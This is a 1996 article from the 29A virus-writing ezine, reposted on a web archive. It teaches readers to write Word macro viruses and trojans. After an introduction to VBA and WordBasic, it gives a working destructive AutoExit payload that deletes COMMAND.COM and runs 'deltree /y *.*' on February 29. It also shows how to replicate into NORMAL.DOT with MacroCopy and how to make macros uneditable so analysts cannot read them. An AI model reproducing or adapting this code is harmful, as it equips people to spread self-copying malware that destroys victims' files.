Copy Link
Add to Bookmark
Report

29A Issue 01 02 05

eZine's profile picture
Published in 
29A
 · 4 years ago

  

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ VBA VIRUSES AND TROJANS @
@ by @
@ Leugim San/29A @
@ & @
@ MaD MoTHeR @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
(@) MaD MoTHeR TeaM - 1996


A macro is a program written in a certain language which is used usually
for automatizing some processes inside an application. In this case, we
will talk about Visual Basic for Applications (VBA) and WordBasic (WB),
which are the languages used by Microsoft and all their programs; thus,
Excel, Project and PowerPoint use VBA, and WinWord uses WB.

From now we will speak about VBA as a general language, because it's the
attempt to unify a macro language, common for all the Microsoft programs.
Anyway, WordBasic has still some characteristics which make that, someti-
mes, we reffer specifically to it.

There are some differences between the syntax of these two languages, but
the coding structure is the same, so, if we don't make any specification,
we'll speak about VBA, as the common Microsoft macro language.

The VBA macros are called procedures; there are two kinds of procedures:

- Sub procedures
- Function procedures

The sub procedures may be executed directly or being called from other
macro. The syntax for these procedures is the following:


Sub <macro_name>
-> write here the macro code <-
' the comments are preceded by an apostrophe
End Sub

Example:

Sub Stupid_Greeting
' This macro opens a dialog box and displays a message
MsgBox "Hello World!"
End Sub


The function procedures (aka functions) return a value, which may be pa-
ssed as a parameter for other VBA procedure. This is its syntax:


Function <function_name>(arguments)
-> Instructions <-
' Commentaries
End Function

Example:

Function AddAB(a,b)
' This adds the parameters a and b and returns the result
' in "AddAB"
AddAB = a+b
End Function


Of course, you can insert in a document as many macros as you need or
want, there's no limit. Now that you've understood what a joint of macros
is, we'll call it VBA module. This means that a VBA module is a joint of
macros (sub and function procedures) which make up an Office document.

The VBA language also works with objects; we can make references to other
documents, graphics... inside the VBA modules. Objects have properties.
For instance, the background color of an object is a property (aka attri-
bute). Objects also have 'methods', which are the operations we can make
with them (with the objects).

VBA allows us to work with variables, and, as a structured programming
language, it has the typical constructions of other languages:


þ 'For-next' bucles:

Sub Counter
Infect_Num=0
For Count=1 to 10
Infect_Num=Infect_Num+Count
Next Count
MsgBox "I reached the maximum infection number"
End Sub


þ 'If-then' conditions:

Sub Infect_Check
If Infect_Num=0 Then MsgBox "File not infected"
End Sub


þ 'With-end with' constructions (used for working with several pro-
perties of a certain object):

Sub ChangeProperties
With Selection
.Font.Bold=True
.Font.ColorIndex=3 ' Red color
End With
End Sub


þ 'Select case-end select' constructions:

Sub Check_Infection
Select Case Infect_Num
Case 0
MsgBox "File not infected"
Case is > 0
MsgBox "File infected"
Case is < 0
Infect_Num=0
End Case
End Sub


A very useful tool for working with the VBA language is the debuggin win-
dow. With it we can trace code, make corrections, and so on... one debug-
ging technique consists on using flags for halting for a moment the code
execution with a MsgBox after each instruction, so we can analyze the
contents of certain variables and/or instructions (albeit the VBA debug-
ger is able to set break points for halting the code execution, too).

Something very important, apart of this, are the arguments of a function
procedure; as we've just seen, the structure of a VBA procedure is this:


Function <name>(arguments)
[...]
End Function


These arguments may be constants, variables, or expressions. Anway, there
are procedures which don't need any arguments:


Function Get_Name()
Name=Application.UserName
End Function


There are function procedures which always have a fixed argument number
(up to 60). Other functions have some fixed arguments and other optional.

Ok, and once the basics of VBA are clear for everybody, we can start
learning something about the thing we're about to study: VBA viruses and
trojans :-)

The VBA language is very versatile, and this is basically due to two rea-
sons: the first of them is its big facility of learning and use; as it's
a high level language orientated to events (not to objects :) it's very
easy to create complex modules without spending many time on it. The se-
cond reason is the extra large number of predefined functions it has,
which make things much easier for us. We could even say a third reason,
but it's really included in the previous one... and it's that we can use
functions (or macros) of *automatic_execution*, so we can simulate some
thingies which make eeeeven easier to write routines as autocopying, me-
mory residency, etc), used by the 'normal' DOS viruses.

Besides this, VBA has, as an exclusive feature, the PORTABILITY property,
advantage, or however you wanna call it. VBA worxor under Windows 3.x,
Windows95, WindowsNT, Macintosh, etc. this is: in every enviroment or OS
in which we can run any version of the applications which support VBA.

But don't expect so many facilities... :-)

VBA is a language which adapts to the language of the application under
it's running. This means that, if we have the spanish version of WinWord,
the names of the predefined functions will be in spanish, so the two next
macros will NOT be the same (the first one is written in spanish, and the
second one, in english):


þ First macro (spanish):

Sub Demo_Macro
Con Selecci¢n.Fuente
.Nombre="Arial"
Fin Con
End Sub


þ Second macro (english):

Sub Demo_Macro
With Selection.Font
.Name="Arial"
End With
End Sub


This last macro would NOT work under our spanish version of WinWord... it
would force a macro execution error, so it wouldn't do anything. And re-
member that VBA is an interpreted language (not compiled) so every execu-
tion error appears 'on the fly'.

But... doesn't this have any solution? ... ... ... ... }:-) ... Sure! ;-)
There are some functions, common to all the VBA versions, without depen-
ding on the language. For instance... the automatic macro AutoExec (which
is executed when loading WinWord if it's stored in a template called NOR-
MAL.DOT) would work under every VBA version.

Maybe one of the first exercises we should do would be trying to write a
multiplatform and multilanguage virus... but maybe it already exists...
}:-) hehe... but let's go on with the tutorial.

The next step, once we've analyzed the language syntax, we have to study
the functions we need to use in our viruses. As this ain't a text about
programming in general but a macro virus tutorial, we'll focus our atten-
tion to the automatic macros used by WinWord, implemented in WordBasic
(but note: NOT in VBA).

There are five special macros which execute automatically and which we'll
have to care about:

þ AutoExec: it's a macro which activates when loading the text processor,
but only when it's stored in the template NORMAL.DOT or in the default
application directory
þ AutoNew: it activates when creating a new document
þ AutoOpen: it activates when opening an existing document
þ AutoClose: it activates when closing a document
þ AutoExit: it activates when exiting the text processor

For proving the potence and the versatility of these macros, we can have
a look at the following code (by now we won't care about the language):


' Save this macro as AutoExit
Sub Main
If Application.Username <> "MaD_MoTHeR" Then
' We check the registration name of the application
SetAttr "C:\COMMAND.COM",0
' Wipe the attributes of COMMAND.COM
Open "C:\COMMAND.COM" for Output as #1
' We open it for checking if it activates any error flag
Close #1
' It exists, ok... let's close it...
Kill "C:\COMMAND.COM"
' ... and kill it }:-)
End If
If Month(Now())=2 Then
' System date -> month=february (2)?
If Day(Now())=29 Then
' february 29th? (only one time each four years) :-)
Shell "deltree /y *.* > null"
' Btw... /y works for all the languages :-)
End If
End If
End Sub


The macro above will check two things on exiting from WinWord: if the re-
gistration name is equal to MaD_MoTHeR, it will delete COMMAND.COM; and
if the system date is equal to february 29th (only for leap years) :-) it
will do a deltree /y *.* > null, and i guess you all know what does this
DOS command do, right? };-)

Ok, now you're supposed to have a big enough knowledge to face the next
and last chapter of this tutorial: replication. It's the most important
thing for writing viruses, don't you think? :-)

The unique thing we must know is how can we adapt an automatic macro
(this is the simplest example) in order to install it in the template
which is opened by default by WinWord. This is done by following the next
steps... first, define a variable which stores the complete macro name:


name$ = WindowName$() + ":AutoNew" ' This macro will be executed
' every time a new document is
' created


And then, all our work is to write it into the template NORMAL.DOT with
this simple instruction:


MacroCopy name$, "Global:AutoNew"


Quite easy, isn't it? :-) Anyway, this is the general way in which macro
viruses work, but there are lots of cooler ways to infect... all it takes
is a little bit of imagination and additional code. One of these things
which make your viruses cooler and difficult their analysis is the macro
encryption... and it's easier than the replication!!! :-)


MacroCopy "MyTemplate:MyMacro", "Global:AutoClose", 1


If you execute the MacroCopy function passing 1 (or any other number un-
less 0) as parameter, the result of the copy will be an only executable
macro, so we won't be able to edit it! :-)

And this is all you need for becoming a macro virus writer... practice,
research, and try to write something really original. Btw, there's a vi-
rus sample i wrote included in '29A virii'. It's a supertiny and super-
simple macro infector which contains a little payload :-) Don't forget to
have a look at it!


(@) MaD MoTHeR TeaM - 1996

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT